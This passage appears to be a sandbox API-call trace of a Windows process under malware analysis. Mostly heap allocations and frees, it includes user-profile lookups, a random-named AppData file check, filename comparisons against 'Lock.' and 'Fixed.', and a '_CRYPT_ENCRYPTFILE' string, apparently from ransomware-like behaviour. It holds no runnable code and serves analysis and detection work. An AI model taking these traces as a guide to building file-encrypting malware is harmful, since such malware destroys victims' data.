lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0234.884] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0234.884] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0234.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0234.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0234.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0234.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e564e0 [0234.885] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/MWbKfh.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\MWbKfh.gif", lpFilePart=0x8cf650*="MWbKfh.gif") returned 0x2a [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0234.885] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\MWbKfh.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mwbkfh.gif")) returned 0xffffffff [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0234.885] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0234.885] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.885] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0234.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0234.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0234.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NRdQ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0234.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RdQ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0234.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0234.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0234.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0234.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0234.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e699e8 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0234.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NRdQ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0234.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RdQ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0234.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0234.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0234.888] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0234.888] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0234.888] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0234.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0234.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0234.889] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0234.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505d8 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0234.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0234.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0234.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0234.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0234.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0234.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0234.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0234.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 